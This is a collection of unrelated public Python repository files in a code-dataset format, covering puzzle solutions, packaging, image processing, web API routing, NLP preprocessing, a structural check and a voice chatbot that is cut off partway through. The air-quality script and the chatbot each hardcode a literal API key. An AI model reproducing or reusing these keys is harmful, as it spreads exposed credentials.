solution2(expression):\n operations = [('+', '-', '*'),('+', '*', '-'),('-', '+', '*'),('-', '*', '+'),('*', '+', '-'),('*', '-', '+')]\n answer = []\n for op in operations:\n a = op[0]\n b = op[1]\n temp_list = []\n for e in expression.split(a):\n temp = [f\"({i})\" for i in e.split(b)]\n print(temp)\n temp_list.append(f'({b.join(temp)})')\n answer.append(abs(eval(a.join(temp_list))))\n return max(answer)\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"jong0717/programmers/lv2/lv2-35_수식최대화.py","file_name":"lv2-35_수식최대화.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24012803508","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport sys\nfrom setuptools import setup\n\nif sys.version_info < (3, 6):\n sys.exit(\n 'Python < 3.6 is not supported. You are using Python {}.{}.'.format(\n sys.version_info[0], sys.version_info[1])\n )\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# To update the package version number, edit claml2transmart/__version__.py\nversion = {}\nwith open(os.path.join(here, 'claml2transmart', '__version__.py')) as f:\n exec(f.read(), version)\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('requirements.txt', 'r') as f:\n required_packages = f.read().splitlines()\n\nsetup(\n name='claml2transmart',\n version=version['__version__'],\n description=\"Example ClaML to TranSMART loader\",\n long_description=readme + '\\n\\n',\n author=\"Gijs Kant\",\n author_email='gijs@thehyve.nl',\n url='https://github.com/thehyve/python_claml2transmart',\n packages=[\n 'claml2transmart',\n ],\n package_dir={'claml2transmart':\n 'claml2transmart'},\n entry_points={\n 'console_scripts': ['claml2transmart=claml2transmart.claml2transmart:main'],\n },\n include_package_data=True,\n license=\"MIT\",\n zip_safe=False,\n keywords='claml2transmart',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'Topic :: Scientific/Engineering :: Bio-Informatics',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n test_suite='tests',\n python_requires='>=3.6.0',\n install_requires=required_packages,\n setup_requires=[\n 'pygments',\n # dependency for `python setup.py test`\n 'pytest-runner',\n # dependencies for `python setup.py build_sphinx`\n 'sphinx',\n 'sphinx_rtd_theme',\n 'recommonmark',\n # dependency for `python setup.py bdist_wheel`\n 'wheel'\n ],\n tests_require=[\n 'pytest',\n 'pytest-cov',\n 'pycodestyle',\n ],\n extras_require={\n 'dev': ['prospector[with_pyroma]', 'yapf', 'isort'],\n }\n)\n","repo_name":"thehyve/python_claml2transmart","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"74052238005","text":"#!/usr/bin/env python2\nimport nd2reader\nfrom sys import argv\nimport pickle\nimport numpy as np\n\nscript, nd2 = argv\n\n# nd2 = nd2reader.Nd2(str(nd2))\n\n# dapi = []\n# fitc = []\n# fitclong = []\n# cy3 = []\n# bfcy3 = []\n\n# for image in nd2.select(channels = 'DAPI'):\n# dapi.append(image)\n\n# for image in nd2.select(channels = 'FITC'):\n# fitc.append(image)\n\n# for image in nd2.select(channels = 'FITClong'):\n# fitclong.append(image)\n\n# for image in nd2.select(channels = 'CY3'):\n# cy3.append(image)\n\n# for image in nd2.select(channels = 'BF-Cy3'):\n# bfcy3.append(image)\n\nim_name_pickle = str(nd2).replace('.nd2', '.pkl')\nnd2 = nd2reader.Nd2(str(nd2))\n\nimg_dict = {'DAPI' : {},\n\t\t\t'FITC' : {},\n\t\t\t'FITClong' : {},\n\t\t\t'CY3' : {},\n\t\t\t'BF-Cy3' : {}}\n\n# nd2 = nd2reader.Nd2(IMAGE_DIR+'/'+img_path)\n\n\n# nd2 = nd2reader.Nd2(img_path)\n\n# print nd2.fields_of_view\n\nfor i in range(len(nd2)):\n\tchannel = nd2[i].channel\n\tfov = nd2[i].field_of_view\n\t# img_dict[channel][fov] = nd2[i]\n\timg_dict[channel][fov] = nd2[i].astype(np.uint16) \n\t# / np.amax(nd2[i]).astype(np.uint16)\n\npickle.dump(img_dict, open(im_name_pickle, 'w'))\n\n","repo_name":"gkreder/tequila_mockingbird_2","sub_path":"nd2_gabe.py","file_name":"nd2_gabe.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19192194325","text":"import numpy as np\nimport cv2\n#from skimage.feature import peak_local_max\n#from skimage.morphology import watershed\n#from scipy import ndimage\nimport time\nimport math\n\n# version miteThruv9b du 19/01/20\n# version du 24/01/20 : ajout détection fourmi\n\nsubstractor = cv2.createBackgroundSubtractorMOG2(history = 100, varThreshold=25, detectShadows=True)\n\ndef bugcount(img,masque, aire_min, aire_max, mode = \"hide\"):\n\tfourmi = False\n\tif mode == \"show\":\n\t\tcv2.imshow('image brute',img) # ajtp\n\t\tcv2.imshow('masque brute',masque) # ajtp\n\t\t#key = cv2.waitKey(0)\n\t# filtrage\n\tgray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\t# effacement de l'arrière plan \n\tbkgd_sup = substractor.apply(gray)\n\tif mode == \"show\":\n\t\tcv2.imshow('suppression arrière plan',bkgd_sup) # ajtp\n\t\t#key = cv2.waitKey(0)\n\t# masquage \"doonut\"\n\tmasque2 = cv2.bitwise_and(bkgd_sup , masque , mask=None)\n\tif mode == \"show\":\n\t\tcv2.imshow('masque',masque2) # ajtp\n\t\t#key = cv2.waitKey(0)\n\t\t\n\t# détermination des contours\n\t_, contours, _ = cv2.findContours(masque2.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n\tcercles=[]\n\tfor c in contours:\n\t\tM = cv2.moments(c)\n\t\taire = (M['m00'])\n\t\tif ((aire > aire_min) and (aire <= aire_max )): \n\t\t\tcentre = ((M['m10']/M['m00']), (M['m01']/M['m00']))\n\t\t\trayon = math.sqrt(aire/math.pi)\n\t\t\tcercle = (centre, rayon)\n\t\t\tcercles.append(cercle)\n\t\tif (aire > aire_max):\n\t\t\tfourmi = True\n\tif mode == \"debug\":\n\t\tprint(\"[INFO] {} unique segments found\".format(len(cercles))) \n\n\treturn (cercles, fourmi)\n\n","repo_name":"LR69/MiteThru","sub_path":"raspberry/src/img_count_utils.py","file_name":"img_count_utils.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6366242112","text":"from __future__ import absolute_import\n\nfrom django.conf.urls import url\nfrom rest_framework import routers\n\nfrom . import views\n\nrouter = routers.SimpleRouter()\nrouter.register(r'videos', views.videos.VideoViewSet)\nrouter.register(r'videos/(?P[\\w\\d]+)/languages',\n views.subtitles.SubtitleLanguageViewSet,\n base_name='subtitle-language')\nrouter.register(r'videos/(?P[\\w\\d]+)/urls',\n views.videos.VideoURLViewSet, base_name='video-url')\nrouter.register(r'teams', views.teams.TeamViewSet, base_name='teams')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/members',\n views.teams.TeamMemberViewSet, base_name='team-members')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/projects',\n views.teams.ProjectViewSet, base_name='projects')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/tasks',\n views.teams.TaskViewSet, base_name='tasks')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/applications',\n views.teams.TeamApplicationViewSet,\n base_name='team-application')\nrouter.register(r'teams/(?P[\\w\\d\\-]+)/notifications',\n views.teams.TeamNotificationViewSet,\n base_name='team-notifications')\nrouter.register(r'users', views.users.UserViewSet, base_name='users')\nrouter.register(r'activity', views.activity.ActivityViewSet,\n base_name='activity')\n\nurlpatterns = router.urls + [\n url(r'^$', views.index.index, name='index'),\n url(r'videos/(?P[\\w\\d]+)/activity/$',\n views.activity.VideoActivityView.as_view(), name='video-activity'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/subtitles/$',\n views.subtitles.SubtitlesView.as_view(), name='subtitles'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/subtitles/actions/$',\n views.subtitles.Actions.as_view(), name='subtitle-actions'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/subtitles/notes/$',\n views.subtitles.NotesList.as_view(), name='subtitle-notes'),\n url(r'videos/(?P[\\w\\d]+)/duration',\n views.videos.VideoDurationView.as_view(), name='video-duration'),\n url(r'videos/(?P[\\w\\d]+)/follow',\n views.videos.VideoFollowerView.as_view(), name='video-follow'),\n url(r'^videos/(?P[\\w\\d]+)'\n '/languages/(?P[\\w-]+)/follow$',\n views.subtitles.LanguageFollowerView.as_view(), name='language-follow'),\n url(r'^teams/(?P[\\w\\d\\-]+)/languages/$',\n views.teams.team_languages, name='team-languages'),\n url(r'teams/(?P[\\w\\d\\-]+)/languages/preferred/',\n views.teams.TeamPreferredLanguagesView.as_view(),\n name='team-languages-preferred'),\n url(r'teams/(?P[\\w\\d\\-]+)/languages/blacklisted/',\n views.teams.TeamBlacklistedLanguagesView.as_view(),\n name='team-languages-blacklisted'),\n url(r'^languages/$', views.languages.languages, name='languages'),\n url(r'^message/$', views.messages.Messages.as_view(), name='messages'),\n url(r'users/(?P[^/]+)/activity/$',\n views.activity.UserActivityView.as_view(), name='user-activity'),\n url(r'teams/(?P[\\w\\d-]+)/activity/$',\n views.activity.TeamActivityView.as_view(), name='team-activity'),\n]\n","repo_name":"jasonboulware/Tardigrades","sub_path":"TestAutomation/project/unisubs/apps/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"39198447930","text":"#!/usr/bin/python\n\"\"\"\nAPI bootstrap file\n\"\"\"\nfrom flask import Flask, jsonify\nimport sys\nimport os\nimport argparse\n\nsys.path.insert(0, os.path.dirname(\n os.path.realpath(__file__)) + '/../../../../lib')\nsys.path.insert(0, os.path.dirname(\n os.path.realpath(__file__)) + '/../../../../conf')\n\nfrom inspired_config import SQLALCHEMY_DATABASE_URI\nfrom database import init_engine, db_session\n\n\ndef create_app(uri):\n \"\"\" dynamically create the app \"\"\"\n app = Flask(__name__)\n #app.config.from_pyfile(config)\n app.config['SQLALCHEMY_DATABASE_URI'] = uri\n #init_engine(app.config['SQLALCHEMY_DATABASE_URI'], pool_recycle=3600, \n #echo=True)\n init_engine(app.config['SQLALCHEMY_DATABASE_URI'], pool_recycle=3600)\n\n @app.teardown_appcontext\n def shutdown_session(exception=None):\n db_session.remove()\n\n @app.errorhandler(400)\n @app.errorhandler(404)\n @app.errorhandler(405)\n @app.errorhandler(500)\n def default_error_handle(error=None):\n \"\"\" handle all errors with json output \"\"\"\n return jsonify(error=error.code, message=str(error), success=False),\\\n error.code\n\n ## add each api Blueprint and create the base route\n from inspired.v1.api.artists.views import artists\n from inspired.v1.api.product_types.views import product_types\n from inspired.v1.api.users.views import users\n from inspired.v1.api.scenes.views import scenes\n from inspired.v1.api.videos.views import videos\n from inspired.v1.api.products.views import products\n from inspired.v1.api.product_styles.views import product_styles\n app.register_blueprint(artists, url_prefix=\"/api/v1/artists\")\n app.register_blueprint(product_types, url_prefix=\"/api/v1/product_types\")\n app.register_blueprint(users, url_prefix=\"/api/v1/users\")\n app.register_blueprint(scenes,url_prefix=\"/api/v1/scene\")\n app.register_blueprint(videos, url_prefix=\"/api/v1/videos\")\n app.register_blueprint(products, url_prefix=\"/api/v1/products\")\n app.register_blueprint(product_styles, url_prefix=\"/api/v1/product_styles\")\n\n return app\n\n\ndef bootstrap(**kwargs):\n \"\"\"bootstraps the application. can handle setup here\"\"\"\n app = create_app(SQLALCHEMY_DATABASE_URI)\n app.debug = True\n app.run(host=kwargs['host'], port=kwargs['port'])\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--host\", help=\"Hostname or IP address\",\n dest=\"host\", type=str, default='0.0.0.0')\n parser.add_argument(\"--port\", help=\"Port number\",\n dest=\"port\", type=int, default=8000)\n kwargs = parser.parse_args()\n bootstrap(**kwargs.__dict__)\n","repo_name":"phriscage/inspired","sub_path":"lib/inspired/v1/api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11764579772","text":"'''Faça um programa que calcule o fatorial de um número inteiro fornecido pelo usuário. \nEx.: 5!=5.4.3.2.1=120 '''\n\nnum = int(input(\"Digite um número qualquer para ser calculado o seu fatorial: \\n\"))\n\nfat = num\naux = num - 1\n \nwhile aux > 1 : \n fat = fat * aux\n aux = aux - 1\n\nprint(\"Fatorial de {} é {}\".format(num, fat))\n","repo_name":"whyohane/estudos","sub_path":"python.org/Lista de Estrutura de Repetição/questao17.py","file_name":"questao17.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14965889523","text":"\"\"\"\n\nVerification of the 2D shear (also called single 2D vortex) verification case. \n\nPublications: \n\n Comminal, R., Spangenberg, J., & Hattel, J. H. (2015). Cellwise conservative unsplit advection \n for the volume of fluid method. Journal of Computational Physics, 283, 582–608.\n\n\"\"\" \n\nfrom lent_error import * \nimport sys\n\ndef main(): \n\n templateCase = sys.argv[1] \n\n # Reduce all dataFrames in all advectionErrors.dat files in all subdirectories.\n data = reduce_dataframe(\"advectionErrors.dat\", templateCase)\n \n # Calculate and insert convergence columns \n add_convergence(data)\n \n # En and O(En) are not needed for this test case in the thesis.\n data.drop('CFL', axis=1, inplace=True)\n data.drop('O(En)', axis=1, inplace=True)\n data.drop('En', axis=1, inplace=True)\n latexData = data.to_latex(float_format=scientific)\n latexData = latexData.replace(\"nan\",'-')\n \n print(latexData)\n \n tableFileName = table_file_name(templateCase) \n \n latexFile = open(tableFileName + \".tex\", \"w\")\n latexFile.write(latexData)\n\n csvFile = open(tableFileName + \".csv\", 'w')\n csvFile.write(data.to_csv()) \n \nif __name__==\"__main__\":\n main()\n","repo_name":"CRC-1194/lent","sub_path":"cases/advection/2Dshear/2Dshear-errors-analyze.py","file_name":"2Dshear-errors-analyze.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"29956183589","text":"import requests\ncity = '@6801'\nurl = 'https://aqicn.org/feed' + city + '/?token='\napi_key = 'b77d3aeca61a0cd899a2a90d6ea4219e72efdd5d'\n\nmain_url = url + api_key\nr = requests.get(main_url)\ndata = r.json()['data']\naqi = data['aqi']\niaqi = data['iaqi']\ndew = iaqi.get('dew','Nil')\nno2 = iaqi.get('no2','Nil')\no3 = iaqi.get('o3','Nil')\nso2 = iaqi.get('so2','Nil')\npm10 = iaqi.get('pm10','Nil')\npm25 = iaqi.get('pm25','Nil')\npollen = iaqi.get('pol','Nil')\n\nprint(f'{city}Jakość powietrza w Olesno:',aqi,'\\n')\nprint('')\nprint('Dew :',dew['v'])\nprint('no2 :',no2['v'])\nprint('Ozone :',o3['v'])\nprint('sulphur :',so2['v'])\nprint('pm10 :',so2['v'])\nprint('pm25 :',pm25['v'])","repo_name":"Rajo03/Portfolio","sub_path":"PYTHON/1PRACE/PROjekty/powietrze.py","file_name":"powietrze.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34354747854","text":"\n\nfrom geom.point import *\n\nraw = [ (2,2), (0,5), (8,0), (9,8), (7,14),\n (13,12), (14,13) ]\npoints = [ Point(p[0], p[1]) for p in raw]\n\ndef get_shortest(all_points):\n min_dist = 5000\n for p1 in all_points:\n for p2 in all_points:\n if p1 is not p2:\n d = p2 - p1\n if d < min_dist:\n min_dist = d\n return min_dist\n\nprint(get_shortest(points))\n","repo_name":"chancekoogler/PointRegionQuadTree","sub_path":"min-dist.py","file_name":"min-dist.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8263106299","text":"import argparse\nimport io\nimport sys\nfrom syntaxd.data.conll import conll_to_sentences\nfrom seqp.vocab import Vocabulary\n\n\ndef main():\n desc = 'Converts a CONLL file to plain text'\n parser = argparse.ArgumentParser(desc)\n parser.add_argument('--input', type=str, required=False)\n parser.add_argument('--word-field', type=int, default=1)\n parser.add_argument('--vocab', type=str, required=True)\n args = parser.parse_args()\n\n input_lines = (io.TextIOWrapper(sys.stdin.buffer, encoding='utf-8')\n if args.input is None else open(args.input, encoding='utf-8'))\n\n with open(args.vocab, encoding='utf-8') as f:\n vocab = Vocabulary.from_json(f.read())\n\n unk_token = vocab.idx2symbol[vocab.unk_id]\n\n def word_or_unk(w: str):\n return w if w in vocab.idx2symbol else unk_token\n\n for conll_sentence in conll_to_sentences(input_lines):\n sentence_tokens = [word_or_unk(word_fields[args.word_field])\n for word_fields in conll_sentence]\n print(' '.join(sentence_tokens))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"noe/iterative_expansion_lms","sub_path":"src/syntaxd/data/conll/conll2text.py","file_name":"conll2text.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"15259295958","text":"import numpy as np\nimport pandas as pd\nimport os\n\nfrom sklearn.preprocessing import LabelEncoder\n\nos.chdir(os.path.abspath(os.getcwd()))\n\nfor data_path in ('data/raw/train_set.csv', 'data/raw/test_set.csv'):\n date_columns = ['checkin', 'checkout']\n df = pd.read_csv(data_path, parse_dates=date_columns)\n df = df.sort_values(by=['utrip_id', 'checkin'])\n\n # Encode features\n for feature in ('affiliate_id', 'city_id', 'hotel_country'):\n le = LabelEncoder()\n le.classes_ = np.load(f'encoders/{feature}_classes.npy', allow_pickle=True)\n df[feature] = le.transform(df[feature].values)\n\n # Take care of dates -> create sin / cos\n for column_name in date_columns:\n df[f'{column_name}_day_of_week_sin'] = np.sin(np.pi * df[column_name].dt.dayofweek / 12)\n df[f'{column_name}_day_of_week_cos'] = np.cos(np.pi * df[column_name].dt.dayofweek / 12)\n df[f'{column_name}_day_sin'] = np.sin(np.pi * df[column_name].dt.day / 62)\n df[f'{column_name}_day_cos'] = np.cos(np.pi * df[column_name].dt.day / 62)\n df[f'{column_name}_month_sin'] = np.sin((np.pi * df[column_name].dt.month - 1) / 22)\n df[f'{column_name}_month_cos'] = np.cos((np.pi * df[column_name].dt.month - 1) / 22)\n df['duration'] = (df.checkout - df.checkin).dt.days\n\n # One-hot encode device_class, booker_country\n for column_name in ('device_class', 'booker_country'):\n df = pd.concat([df, pd.get_dummies(df[column_name])], axis=1)\n df.drop(column_name, inplace=True, axis=1)\n\n # Filter training data to sequences longer than 1\n if data_path == 'data/raw/train_set.csv':\n df['seq_len'] = df['utrip_id'].map(df.groupby('utrip_id').aggregate('size'))\n df = df[df['seq_len'] > 1]\n df.drop('seq_len', axis=1, inplace=True)\n df['destination'] = df['utrip_id'].map(df.groupby('utrip_id').aggregate('city_id').aggregate('last'))\n else:\n test_destinations = pd.read_csv('data/raw/ground_truth.csv')\n df = df.merge(test_destinations[['utrip_id', 'city_id']], on='utrip_id', how='left')\n df = df.rename({'city_id_y': 'destination', 'city_id_x': 'city_id'}, axis=1)\n le = LabelEncoder()\n le.classes_ = np.load(f'encoders/city_id_classes.npy', allow_pickle=True)\n df['destination'] = le.transform(df['destination'].values)\n\n print(df.head().to_string())\n print(df.describe().to_string())\n print(df.dtypes)\n print('='*30)\n os.makedirs('data/processed', exist_ok=True)\n df.to_csv(f'data/processed/{data_path.rsplit(\"/\", 1)[-1]}', index=False)\n","repo_name":"MisterCapi/Booking_reccomendation_model","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10965932219","text":"# -*- coding: utf-8 -*-\n\nexec(open(\"./xc_model.py\").read()) #FE model generation\nfrom postprocess.serviceability_limit_states import ibc_2018_sls\nfrom colorama import Fore\nfrom colorama import Style\n\n# Solution\n# Linear static analysis.\nanalysis= predefined_solutions.simple_static_linear(FEcase)\n#analysis= predefined_solutions.penalty_modified_newton(FEcase)\n\ndef getDeflectionLimit(span, ibcLoadCase):\n loadComb= deflectionLoadCombinations[ibcLoadCase]\n dl= ('deadLoad' in loadComb)\n ll= ('liveLoad' in loadComb)\n sl= ('snowLoad' in loadComb)\n wl= ('windLoad' in loadComb)\n return ibc_2018_sls.getDeflectionLimit(span= span, memberType= 'Roof', memberSubType= 'NonPlasterCeiling', deadLoad= dl, liveLoad= ll, snowLoad= sl, windLoad= wl)\n\n#span= 5.476\nspan= 6.906\nworstCase= None\nworstDeflection= 0.0\nfor key in deflectionLoadCombinations:\n loadCaseName= 'SLS'+key\n modelSpace.addLoadCaseToDomain(loadCaseName)\n deflectionLimit= getDeflectionLimit(span, key)\n result= analysis.analyze(1)\n maxDeflection= 0.0\n for l in xcTotalSet.lines:\n for n in l.nodes:\n currentPos= n.getCurrentPos3d(1.0)\n deflection= l.dist(currentPos)\n maxDeflection= max(maxDeflection, deflection)\n maxDeflection*= 1.2\n if(abs(maxDeflection)>worstDeflection):\n worstDeflection= abs(maxDeflection)\n worstCase= loadCaseName\n deflectionOk= (maxDeflection<=deflectionLimit)\n outputStr= 'max. deflection ('+loadCaseName+'): '+str(maxDeflection*1e3)+ ' mm (L/'+str(span/maxDeflection)+') deflection limit: '+ str(deflectionLimit*1e3)+ 'mm (L/'+str(span/deflectionLimit)+') => '\n if(deflectionOk):\n print(Fore.GREEN+outputStr+'OK'+Style.RESET_ALL)\n else:\n print(Fore.RED+outputStr+'KO'+Style.RESET_ALL)\n modelSpace.removeLoadCaseFromDomain(loadCaseName)\n modelSpace.revertToStart()\n\n# Display worst case.\n## Solve (again).\nmodelSpace.addLoadCaseToDomain(worstCase)\n# Solution\n# Linear static analysis.\nanalysis= predefined_solutions.simple_static_linear(FEcase)\n#analysis= predefined_solutions.penalty_modified_newton(FEcase)\nresult= analysis.analyze(1)\n# failedNode= modelSpace.locateEquationNumber(269)\n# failedPos= failedNode.getInitialPos3d\n# print(failedNode.tag, failedPos)\n# quit()\n\n# Graphic stuff.\nfrom postprocess import output_handler\noh= output_handler.OutputHandler(modelSpace)\n\n# oh.displayBlocks()#setToDisplay= beamSet)\n# oh.displayFEMesh()\n#oh.displayLocalAxes(setToDisplay= beamSet)\n# oh.displayStrongWeakAxis(setToDisplay= beamSet)\n# oh.displayLoads()#setToDisplay= lvlBlindFasciaSet)\n# oh.displayReactions(reactionCheckTolerance= 1e-4)\noh.displayDispRot(itemToDisp='uZ', defFScale= 10.0)#, setToDisplay= longBeamSet)\n# oh.displayIntForcDiag(itemToDisp= 'Mz')#, setToDisplay= beamSet)\n#oh.displayIntForcDiag(itemToDisp= 'Qy', setToDisplay= xcTotalSet)\n#oh.displayIntForcDiag(itemToDisp= 'Mz', setToDisplay= xcTotalSet)\n#oh.displayIntForcDiag(itemToDisp= 'T', setToDisplay= beamSet)\n","repo_name":"xcfem/xc_examples","sub_path":"wood_structure/wood_floor_structure/display_deflection.py","file_name":"display_deflection.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"76"} +{"seq_id":"7165053614","text":"import random\r\nimport json\r\nimport self\r\nimport pickle\r\nimport numpy as np\r\nimport speech_recognition\r\nimport pyttsx3 as tts\r\nimport sys\r\nimport datetime\r\nimport time\r\nimport wikipedia\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\n\r\nrecognizer=speech_recognition.Recognizer()\r\nspeaker=tts.init()\r\nvoices=speaker.getProperty('voices')\r\nspeaker.setProperty('voice',voices[1].id)\r\nspeaker.setProperty('rate',170)\r\ntodo=[]\r\n\r\nimport nltk\r\nfrom nltk.stem import WordNetLemmatizer\r\n\r\nfrom tensorflow.keras.models import load_model\r\n\r\nlemmatizer=WordNetLemmatizer\r\nintents=json.loads(open('intents.json').read())\r\n\r\nwords=pickle.load(open('words.pkl','rb'))\r\nclasses=pickle.load(open('classes.pkl','rb'))\r\nmodel=load_model('chatbot_model.h5')\r\n\r\nimport requests\r\n\r\napi_key = \"cd1a705e3a5f59b120ec6189e11f810e\"\r\n\r\ndef get_weather(city_name):\r\n global temp\r\n api_url = \"http://api.openweathermap.org/data/2.5/weather?q={}&appid={}\".format(city_name, api_key)\r\n\r\n response = requests.get(api_url)\r\n response_dict = response.json()\r\n\r\n weather = response_dict[\"weather\"][0][\"description\"]\r\n temp=response_dict[\"main\"][\"temp\"]\r\n temp=\"{:.2f}\".format(temp-273.15)\r\n\r\n if response.status_code == 200:\r\n return weather\r\n else:\r\n print('[!] HTTP {0} calling [{1}]'.format(response.status_code, api_url))\r\n return None\r\n\r\nimport spacy\r\nimport requests\r\n\r\nnlp=spacy.load(\"en_core_web_md\")\r\n#nlp=spacy.load(\"en_core_web_sm\")\r\ndef chatbot(statement):\r\n weather=nlp(\"Current weather in city\")\r\n statement=nlp(statement)\r\n min_similarity=0.4\r\n\r\n if weather.similarity(statement)>=min_similarity:\r\n for ent in statement.ents:\r\n if ent.label_ ==\"GPE\":\r\n city=ent.text\r\n break\r\n else:\r\n res=\"You need to tell me a city to check\"\r\n return res\r\n\r\n city_weather=get_weather(city)\r\n if city_weather is not None:\r\n res=\"In \"+city+\", the current weather is \"+city_weather+ \" and the temperature is \"+str(temp)+\" °C\"\r\n return res\r\n else:\r\n res=\"something went wrong\"\r\n return res\r\n else:\r\n res=\"sorry i don't understand that\"\r\n return res\r\n\r\ndef yt(text):\r\n text = text.lower()\r\n co = Options()\r\n co.add_experimental_option(\"detach\", True)\r\n driver = webdriver.Chrome(r\"C:\\chromedriver.exe\", options=co)\r\n driver.implicitly_wait(1)\r\n driver.maximize_window()\r\n #ind = text.split()[2:]\r\n speaker.say(\"What do you want to play on Youtube?\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : What do you want to play on Youtube?\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n try:\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.2)\r\n audio=recognizer.listen(mic)\r\n name=recognizer.recognize_google(audio)\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + name + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n name=name.split()\r\n driver.get(\"http://www.youtube.com/results?search_query=\" + '+'.join(name))\r\n res=\"Youtube Opened\"\r\n return res\r\n except(speech_recognition.UnknownValueError):\r\n res=\"Sorry could not understand that\"\r\n return res\r\n\r\n\r\n\r\ndef clean_up_sentence(sentence):\r\n sentence_words=nltk.word_tokenize(sentence)\r\n sentence_words=[lemmatizer.lemmatize(self,word.lower()) for word in sentence_words]\r\n return sentence_words\r\n\r\ndef bag_of_words(sentence,words,show_details=True):\r\n sentence_words=clean_up_sentence(sentence)\r\n bag=[0]*len(words)\r\n for w in sentence_words:\r\n for i, word in enumerate(words):\r\n if word==w:\r\n bag[i]=1\r\n\r\n return(np.array(bag))\r\n\r\ndef predict_class(sentence,model):\r\n bow=bag_of_words(sentence,words,show_details=False)\r\n res=model.predict(np.array([bow]))[0]\r\n ERROR_THRESHOLD=0.25\r\n results=[[i,r]for i,r in enumerate(res) if r>ERROR_THRESHOLD]\r\n\r\n results.sort(key=lambda x:x[1],reverse=True)\r\n return_list=[]\r\n for r in results:\r\n return_list.append({'intent':classes[r[0]],'probability':str(r[1])})\r\n return return_list\r\n\r\ndef get_response(intents_list,intents_json):\r\n tag=intents_list[0]['intent']\r\n list_of_intents=intents_json['intents']\r\n for i in list_of_intents:\r\n if i['tag']==tag:\r\n result=random.choice(i['responses'])\r\n break\r\n return result\r\n\r\nfrom PyDictionary import PyDictionary\r\ndict=PyDictionary()\r\n\r\ndef meaning(text):\r\n return dict.meaning(str(text).split()[2])['Noun'][0]\r\n\r\ntodo=[]\r\ndef create_note():\r\n global recognizer\r\n note=\"What do you want to write onto your note?\"\r\n speaker.say(note)\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : \" + note + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n done=False\r\n while not done:\r\n try:\r\n with speech_recognition.Microphone() as mic:\r\n recognizer.adjust_for_ambient_noise(mic,duration=1)\r\n audio=recognizer.listen(mic)\r\n note=recognizer.recognize_google(audio)\r\n note=note.lower()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + note + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n\r\n speaker.say(\"Choose a filename\")\r\n speaker.runAndWait()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"Lyra : Choose a filename\" + '\\n\\n')\r\n ChatLog.config(state=DISABLED)\r\n base.update()\r\n recognizer.adjust_for_ambient_noise(mic,duration=0.6)\r\n audio=recognizer.listen(mic)\r\n filename=recognizer.recognize_google(audio)\r\n filename=filename.lower()\r\n ChatLog.config(state=NORMAL)\r\n ChatLog.insert(END, \"You : \" + filename + 